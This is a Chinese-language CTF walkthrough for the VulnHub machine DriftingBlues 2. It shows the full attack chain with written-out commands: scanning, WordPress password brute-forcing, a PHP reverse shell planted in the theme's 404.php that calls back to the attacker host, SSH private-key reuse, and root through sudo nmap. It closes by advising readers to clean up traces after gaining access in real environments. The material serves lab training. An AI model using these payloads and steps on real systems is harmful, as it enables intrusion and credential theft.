1. 靶机环境搭建与网络扫描DriftingBlues 2是VulnHub上一个经典的入门级渗透测试靶机难度标记为简单非常适合新手练习从信息收集到提权的完整流程。我们先在VirtualBox中导入靶机镜像网络模式选择Host-Only确保攻击机Kali192.168.9.7与靶机处于同一局域网。这里有个细节要注意VirtualBox的Host-Only网卡需要与VMware桥接模式网卡绑定否则可能出现网络不通的情况。网络扫描是渗透测试的第一步我习惯先用四种方式交叉验证arp-scan -I eth0 -l快速定位存活主机masscan 192.168.9.0/24 -p 80,22闪电式端口扫描netdiscover -i eth0 -r 192.168.9.0/24可视化主机发现终极武器nmap -A -sV -T4 -p- 192.168.9.23全端口深度扫描扫描结果显示三个关键端口21/tcpProFTPD服务支持匿名登录重大突破口22/tcpOpenSSH 7.9p1后续渗透通道80/tcpApache 2.4.38Web应用入口2. 漏洞枚举与初步渗透2.1 FTP匿名登录突破nmap结果中ftp-anon: Anonymous FTP login allowed这行字让我眼前一亮。使用ftp 192.168.9.23连接用户名填anonymous密码为空即可登录。里面唯一的文件secret.jpg下载到本地后用exiftool和binwalk分析却一无所获——这是个典型的干扰项新手容易在这里浪费时间。2.2 Web目录爆破与指纹识别80端口的网页看似空白但用dirsearch -u http://192.168.9.23/ -e php,html,txt扫描发现关键路径/blog/。这是个WordPress站点页面源代码里藏了个彩蛋driftingblues.box这个域名。将其添加到/etc/hosts文件后页面样式正常加载了。WPScan是WordPress渗透的瑞士军刀执行wpscan --url http://driftingblues.box/blog/ -e ap,at,u参数说明-e ap扫描所有插件-e at扫描所有主题-e u枚举用户扫描结果曝出用户名albert用rockyou.txt字典爆破wpscan --url http://driftingblues.box/blog/ -U albert -P /usr/share/wordlists/rockyou.txt十分钟后拿到密码scotland1。3. WordPress后台getshell实战登录WordPress后台后在外观-主题编辑器中找到404.php模板。将Kali自带的php-reverse-shell代码粘贴进去注意修改连接IP和端口?php $sockfsockopen(192.168.9.7,6666); exec(/bin/sh -i 3 3 23); ?在Kali上启动监听nc -lvnp 6666访问不存在的页面触发shell比如http://driftingblues.box/blog/index.php/test。获得反弹shell后用Python升级交互式终端python3 -c import pty; pty.spawn(/bin/bash)4. 横向移动与SSH私钥利用在/home目录发现用户freddie其.ssh文件夹中藏着id_rsa私钥文件。将私钥复制到攻击机后需要处理三个关键步骤修正文件权限chmod 600 id_rsa转换换行符dos2unix id_rsa连接测试ssh -i id_rsa freddie192.168.9.23成功登录后找到user.txt第一个flag。检查sudo权限时发现惊喜sudo -l User freddie may run the following commands on driftingblues: (ALL) NOPASSWD: /usr/bin/nmap5. Nmap特权升级终极之战GTFOBins提供了nmap的sudo提权方案这里我测试了两种可靠方法方法一交互模式提权sudo nmap --interactive nmap !sh方法二脚本执行提权TF$(mktemp) echo os.execute(/bin/sh) $TF sudo nmap --script$TF获得root shell后经典的python3 -c import pty; pty.spawn(/bin/bash)让终端更稳定最终在/root目录找到flag2。整个渗透过程涉及FTP匿名访问、WordPress漏洞利用、SSH私钥复用和sudo提权四大技术点每个环节都值得新手反复练习。记得在真实环境中获取权限后要及时清理痕迹保持职业操守。